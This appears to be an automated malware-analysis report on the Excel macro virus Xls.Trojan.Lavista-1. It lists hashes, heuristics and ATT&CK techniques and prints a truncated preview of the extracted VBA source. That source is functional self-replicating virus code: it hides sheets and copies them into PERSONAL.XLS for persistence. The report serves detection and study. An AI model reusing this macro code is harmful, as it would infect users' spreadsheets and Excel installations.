Xls.Trojan.Lavista-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 fddd2c3a3822345d…

MALICIOUS

Office (OLE)

37.0 KB Created: 2003-07-09 13:48:43 First seen: 2012-06-14
MD5: ae22cab5146286a876cf2a20efd84442 SHA-1: 97fb5a79e9797f5e15c53eb6907aa36b8b350f64 SHA-256: fddd2c3a3822345d196fa775392bacdc2beec47c3f741f701e25db71538417b2
180 Risk Score

Malware Insights

Xls.Trojan.Lavista-1 · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is identified as a malicious Excel 5 macro-virus (Laroux/Lavista-1) by multiple heuristics, including critical firings for macro virus markers and ClamAV detection. The VBA script contains an Auto_Open macro, which is designed to execute automatically upon opening the document. The script attempts to establish persistence by checking for and potentially modifying the 'PERSONAL.XLS' file, indicating an intent to ensure the malware runs whenever Excel is started.

Heuristics 4

  • ClamAV: Xls.Trojan.Lavista-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Lavista-1
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5441 bytes
SHA-256: daff1c14b50b2d4c156f2e01393268200ceae19e512b063553534190d7e67f41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ape"




Dim no As Integer
Dim off As Integer
Dim find_mod As Integer
Dim find_mod_per As Integer
Dim exist_per As Integer

Sub test_aktiv_book()
Attribute test_aktiv_book.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    On Error GoTo defect
    no = 1
    find_mod = 0
    off = 0
    Do While off = 0
        If ActiveWorkbook.Modules(no).Name = "ape" Then
            off = 1
            find_mod = 1
        Else
            no = no + 1
        End If
    Loop
    Exit Sub
defect:
    find_mod = 0
End Sub
Sub test_personal()
Attribute test_personal.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    If UCase(Dir(Application.StartupPath & "\" & "PERSONAL.XLS)) = "PERSONAL.XLS" Then
        exist_per = 4
    Else
        exist_per = 0
    End If
    If exist_per = 4 Then
        On Error GoTo defect
        no = 1
        find_mod_per = 0
        off = 0
        Do While off = 0
            If Workbooks("PERSONAL.XLS").Modules(no).Name = "ape" Then
                off = 1
                find_mod_per = 2
            Else
                no = no + 1
            End If
        Loop
        Exit Sub
defect:
        find_mod_per = 0
    Else
        find_mod_per = 0
    End If
End Sub
Sub create_modul()
Attribute create_modul.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    On Error GoTo defect
    Application.DisplayAlerts = False
    Application.Run ("test_aktiv_book")
    Application.Run ("test_personal")
    path_book = ActiveWorkbook.Path
    name_book = ActiveWorkbook.Name
    name_sheet = ActiveSheet.Name
    If exist_per + find_mod + find_mod_per = 6 Then
        Windows("PERSONAL.XLS").Visible = True
        Sheets("ape").Visible = True
        Sheets("monkey").Visible = True
        Workbooks("PERSONAL.XLS").Sheets("ape").Copy before:=Workbooks(name_book).Sheets(1)
        Workbooks("PERSONAL.XLS").Sheets("monkey").Copy before:=Workbooks(name_book).Sheets(1)
        Workbooks(name_book).Sheets("ape").Visible = False
        Workbooks(name_book).Sheets("monkey").Visible = xlVeryHidden
        Workbooks("PERSONAL.XLS").Sheets("ape").Visible = False
        Workbooks("PERSONAL.XLS").Sheets("monkey").Visible = xlVeryHidden
        Windows("PERSONAL.XLS").Visible = False
        Workbooks("PERSONAL.XLS").Save
        Workbooks(name_book).Sheets(name_sheet).Activate
        If ActiveWorkbook.Path <> "" Then
            Workbooks(name_book).Save
        End If
    ElseIf exist_per + find_mod + find_mod_per = 5 Then
        Windows("PERSONAL.XLS").Visible = True
        Workbooks(name_book).Sheets("ape").Visible = True
        Workbooks(name_book).Sheets("monkey").Visible = True
        Workbooks(name_book).Sheets("ape").Copy before:=Workbooks("PERSONAL.XLS").Sheets(1)
        Workbooks(name_book).Sheets("monkey").Copy before:=Workbooks("PERSONAL.XLS").Sheets(1)
        Workbooks(name_book).Sheets("ape").Visible = False
        Workbooks(name_book).Sheets("monkey").Visible = xlVeryHidden
        Workbooks("PERSONAL.XLS").Sheets("ape").Visible = False
        Workbooks("PERSONAL.XLS").Sheets("monkey").Visible = xlVeryHidden
        Windows("PERSONAL.XLS").Visible = False
        Workbooks("PERSONAL.XLS").Save
        Workbooks(name_book).Sheets(name_sheet).Activate
        Application.OnWindow = ""
        Application.OnWindow = "PERSONAL.XLS!create_modul"
    ElseIf exist_per + find_mod + find_mod_per = 1 Then
        Workbooks(name_book).Modules.Add
        new_module = ActiveSheet.Name
        ActiveSheet.Select
        ActiveSheet.Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        new_book = ActiveWorkbook.Name
        ActiveWindow.Visible = False
        Workbooks(new_book).SaveAs Filename:=Application.StartupPath & "\" & "PERSONAL.XLS"
        Windows("PERSONAL.XLS"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.